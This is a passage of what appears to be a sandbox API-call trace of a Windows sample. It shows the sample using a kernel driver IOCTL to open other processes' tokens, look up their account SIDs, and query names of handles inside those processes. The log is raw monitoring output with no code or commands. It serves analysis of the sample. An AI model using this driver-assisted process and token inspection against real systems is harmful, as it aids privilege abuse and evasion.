TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.645] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.645] IoCompleteRequest () returned 0x0 [0291.645] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.645] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.646] CloseHandle (hObject=0x18c) returned 1 [0291.646] CloseHandle (hObject=0x188) returned 1 [0291.646] PsLookupProcessByProcessId (in: ProcessId=0x404, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.646] PsAcquireProcessExitSynchronization () returned 0x0 [0291.646] KeStackAttachProcess (in: PROCESS=0xffffe000693a45c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000693a45c0, ApcState=0xffffd000ac0cf400) [0291.646] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a386190, HandleInformation=0x0) returned 0x0 [0291.646] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.646] PsReleaseProcessExitSynchronization () returned 0x2 [0291.646] ObfDereferenceObject (Object=0xffffe000693a45c0) returned 0x27ff0 [0291.646] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.646] ObfDereferenceObject (Object=0xffffe0006a386190) returned 0x7ffe [0291.646] IoCompleteRequest () returned 0x0 [0291.646] PsLookupProcessByProcessId (in: ProcessId=0x404, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.646] PsAcquireProcessExitSynchronization () returned 0x0 [0291.646] KeStackAttachProcess (in: PROCESS=0xffffe000693a45c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000693a45c0, ApcState=0xffffd000ac0cf400) [0291.646] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006939ff20, HandleInformation=0x0) returned 0x0 [0291.646] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.646] PsReleaseProcessExitSynchronization () returned 0x2 [0291.646] ObfDereferenceObject (Object=0xffffe000693a45c0) returned 0x27fef [0291.646] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.646] ObfDereferenceObject (Object=0xffffe0006939ff20) returned 0x7ffe [0291.646] IoCompleteRequest () returned 0x0 [0291.646] PsLookupProcessByProcessId (in: ProcessId=0x404, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.646] PsAcquireProcessExitSynchronization () returned 0x0 [0291.646] KeStackAttachProcess (in: PROCESS=0xffffe000693a45c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000693a45c0, ApcState=0xffffd000ac0cf400) [0291.646] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b02db0, HandleInformation=0x0) returned 0x0 [0291.646] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.646] PsReleaseProcessExitSynchronization () returned 0x2 [0291.646] ObfDereferenceObject (Object=0xffffe000693a45c0) returned 0x27fee [0291.646] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.646] ObfDereferenceObject (Object=0xffffe00069b02db0) returned 0x7ffe [0291.646] IoCompleteRequest () returned 0x0 [0291.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x520) returned 0x188 [0291.647] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.647] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000693a1640, HandleInformation=0x0) returned 0x0 [0291.647] ObOpenObjectByPointer (in: Object=0xffffe000693a1640, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.647] ObfDereferenceObject (Object=0xffffe000693a1640) returned 0x2fff2 [0291.647] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.647] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.647] IoCompleteRequest () returned 0x0 [0291.647] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.647] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.648] CloseHandle (hObject=0x18c) returned 1 [0291.648] CloseHandle (hObject=0x188) returned 1 [0291.648] PsLookupProcessByProcessId (in: ProcessId=0x520, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.648] PsAcquireProcessExitSynchronization () returned 0x0 [0291.648] KeStackAttachProcess (in: PROCESS=0xffffe000693a1640, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000693a1640, ApcState=0xffffd000ac0cf400) [0291.648] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069385f20, HandleInformation=0x0) returned 0x0 [0291.648] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.648] PsReleaseProcessExitSynchronization () returned 0x2 [0291.648] ObfDereferenceObject (Object=0xffffe000693a1640) returned 0x27ff0 [0291.648] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.648] ObfDereferenceObject (Object=0xffffe00069385f20) returned 0x7ffe [0291.648] IoCompleteRequest () returned 0x0 [0291.648] PsLookupProcessByProcessId (in: ProcessId=0x520, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.648] PsAcquireProcessExitSynchronization () returned 0x0 [0291.648] KeStackAttachProcess (in: PROCESS=0xffffe000693a1640, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000693a1640, ApcState=0xffffd000ac0cf400) [0291.648] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006915ac80, HandleInformation=0x0) returned 0x0 [0291.648] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.648] PsReleaseProcessExitSynchronization () returned 0x2 [0291.648] ObfDereferenceObject (Object=0xffffe000693a1640) returned 0x27fef [0291.648] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.648] ObfDereferenceObject (Object=0xffffe0006915ac80) returned 0x7ffe [0291.648] IoCompleteRequest () returned 0x0 [0291.648] PsLookupProcessByProcessId (in: ProcessId=0x520, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.648] PsAcquireProcessExitSynchronization () returned 0x0 [0291.648] KeStackAttachProcess (in: PROCESS=0xffffe000693a1640, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000693a1640, ApcState=0xffffd000ac0cf400) [0291.648] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691914e0, HandleInformation=0x0) returned 0x0 [0291.648] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.648] PsReleaseProcessExitSynchronization () returned 0x2 [0291.648] ObfDereferenceObject (Object=0xffffe000693a1640) returned 0x27fee [0291.648] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.648] ObfDereferenceObject (Object=0xffffe000691914e0) returned 0x7ffe [0291.648] IoCompleteRequest () returned 0x0 [0291.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa80) returned 0x188 [0291.648] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.648] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006994c540, HandleInformation=0x0) returned 0x0 [0291.648] ObOpenObjectByPointer (in: Object=0xffffe0006994c540, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.649] ObfDereferenceObject (Object=0xffffe0006994c540) returned 0x2fff2 [0291.649] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.649] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.649] IoCompleteRequest () returned 0x0 [0291.649] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.649] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.649] CloseHandle (hObject=0x18c) returned 1 [0291.650] CloseHandle (hObject=0x188) returned 1 [0291.650] PsLookupProcessByProcessId (in: ProcessId=0xa80, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.650] PsAcquireProcessExitSynchronization () returned 0x0 [0291.650] KeStackAttachProcess (in: PROCESS=0xffffe0006994c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006994c540, ApcState=0xffffd000ac0cf400) [0291.650] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0a9400, HandleInformation=0x0) returned 0x0 [0291.650] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.650] PsReleaseProcessExitSynchronization () returned 0x2 [0291.650] ObfDereferenceObject (Object=0xffffe0006994c540) returned 0x27ff0 [0291.650] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.650] ObfDereferenceObject (Object=0xffffe0006a0a9400) returned 0x7ffe [0291.650] IoCompleteRequest () returned 0x0 [0291.650] PsLookupProcessByProcessId (in: ProcessId=0xa80, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.650] PsAcquireProcessExitSynchronization () returned 0x0 [0291.650] KeStackAttachProcess (in: PROCESS=0xffffe0006994c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006994c540, ApcState=0xffffd000ac0cf400) [0291.650] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069d92610, HandleInformation=0x0) returned 0x0 [0291.650] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.650] PsReleaseProcessExitSynchronization () returned 0x2 [0291.650] ObfDereferenceObject (Object=0xffffe0006994c540) returned 0x27fef [0291.650] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.650] ObfDereferenceObject (Object=0xffffe00069d92610) returned 0x7ffe [0291.650] IoCompleteRequest () returned 0x0 [0291.650] PsLookupProcessByProcessId (in: ProcessId=0xa80, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.650] PsAcquireProcessExitSynchronization () returned 0x0 [0291.650] KeStackAttachProcess (in: PROCESS=0xffffe0006994c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006994c540, ApcState=0xffffd000ac0cf400) [0291.650] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069af1450, HandleInformation=0x0) returned 0x0 [0291.650] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.650] PsReleaseProcessExitSynchronization () returned 0x2 [0291.650] ObfDereferenceObject (Object=0xffffe0006994c540) returned 0x27fee [0291.650] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.650] ObfDereferenceObject (Object=0xffffe00069af1450) returned 0x7ffe [0291.650] IoCompleteRequest () returned 0x0 [0291.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x188 [0291.650] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.650] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069360080, HandleInformation=0x0) returned 0x0 [0291.650] ObOpenObjectByPointer (in: Object=0xffffe00069360080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.650] ObfDereferenceObject (Object=0xffffe00069360080) returned 0x2fff2 [0291.650] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.650] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.650] IoCompleteRequest () returned 0x0 [0291.651] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.651] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.652] CloseHandle (hObject=0x18c) returned 1 [0291.652] CloseHandle (hObject=0x188) returned 1 [0291.652] PsLookupProcessByProcessId (in: ProcessId=0x514, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.652] PsAcquireProcessExitSynchronization () returned 0x0 [0291.652] KeStackAttachProcess (in: PROCESS=0xffffe00069360080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069360080, ApcState=0xffffd000ac0cf400) [0291.652] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000745326f0, HandleInformation=0x0) returned 0x0 [0291.652] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.652] PsReleaseProcessExitSynchronization () returned 0x2 [0291.652] ObfDereferenceObject (Object=0xffffe00069360080) returned 0x27ff0 [0291.652] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.652] ObfDereferenceObject (Object=0xffffe000745326f0) returned 0x7ffe [0291.652] IoCompleteRequest () returned 0x0 [0291.652] PsLookupProcessByProcessId (in: ProcessId=0x514, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.652] PsAcquireProcessExitSynchronization () returned 0x0 [0291.652] KeStackAttachProcess (in: PROCESS=0xffffe00069360080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069360080, ApcState=0xffffd000ac0cf400) [0291.652] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069871990, HandleInformation=0x0) returned 0x0 [0291.652] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.652] PsReleaseProcessExitSynchronization () returned 0x2 [0291.652] ObfDereferenceObject (Object=0xffffe00069360080) returned 0x27fef [0291.652] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.652] ObfDereferenceObject (Object=0xffffe00069871990) returned 0x7ffe [0291.652] IoCompleteRequest () returned 0x0 [0291.652] PsLookupProcessByProcessId (in: ProcessId=0x514, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.652] PsAcquireProcessExitSynchronization () returned 0x0 [0291.652] KeStackAttachProcess (in: PROCESS=0xffffe00069360080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069360080, ApcState=0xffffd000ac0cf400) [0291.652] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f5ef20, HandleInformation=0x0) returned 0x0 [0291.652] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.652] PsReleaseProcessExitSynchronization () returned 0x2 [0291.652] ObfDereferenceObject (Object=0xffffe00069360080) returned 0x27fee [0291.652] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.652] ObfDereferenceObject (Object=0xffffe00069f5ef20) returned 0x7ffe [0291.653] IoCompleteRequest () returned 0x0 [0291.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2f0) returned 0x188 [0291.653] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.653] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000691ca840, HandleInformation=0x0) returned 0x0 [0291.653] ObOpenObjectByPointer (in: Object=0xffffe000691ca840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.653] ObfDereferenceObject (Object=0xffffe000691ca840) returned 0x2fff2 [0291.653] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006a473440 | out: TokenHandle=0xffffe0006a473440*=0x18c) returned 0x0 [0291.653] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.653] IoCompleteRequest () returned 0x0 [0291.653] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.653] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.654] CloseHandle (hObject=0x18c) returned 1 [0291.655] CloseHandle (hObject=0x188) returned 1 [0291.655] PsLookupProcessByProcessId (in: ProcessId=0x2f0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.655] PsAcquireProcessExitSynchronization () returned 0x0 [0291.655] KeStackAttachProcess (in: PROCESS=0xffffe000691ca840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691ca840, ApcState=0xffffd000ac0cf400) [0291.655] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069185f20, HandleInformation=0x0) returned 0x0 [0291.655] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.655] PsReleaseProcessExitSynchronization () returned 0x2 [0291.655] ObfDereferenceObject (Object=0xffffe000691ca840) returned 0x27ff0 [0291.655] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.655] ObfDereferenceObject (Object=0xffffe00069185f20) returned 0x7ffe [0291.655] IoCompleteRequest () returned 0x0 [0291.655] PsLookupProcessByProcessId (in: ProcessId=0x2f0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.655] PsAcquireProcessExitSynchronization () returned 0x0 [0291.655] KeStackAttachProcess (in: PROCESS=0xffffe000691ca840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691ca840, ApcState=0xffffd000ac0cf400) [0291.655] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069160ee0, HandleInformation=0x0) returned 0x0 [0291.655] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.655] PsReleaseProcessExitSynchronization () returned 0x2 [0291.655] ObfDereferenceObject (Object=0xffffe000691ca840) returned 0x27fef [0291.655] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.655] ObfDereferenceObject (Object=0xffffe00069160ee0) returned 0x7ffe [0291.655] IoCompleteRequest () returned 0x0 [0291.655] PsLookupProcessByProcessId (in: ProcessId=0x2f0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.655] PsAcquireProcessExitSynchronization () returned 0x0 [0291.655] KeStackAttachProcess (in: PROCESS=0xffffe000691ca840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000691ca840, ApcState=0xffffd000ac0cf400) [0291.655] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691c4ba0, HandleInformation=0x0) returned 0x0 [0291.655] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.655] PsReleaseProcessExitSynchronization () returned 0x2 [0291.655] ObfDereferenceObject (Object=0xffffe000691ca840) returned 0x27fee [0291.655] ObQueryNameString (in: Object=0xffffe00067e4f240, 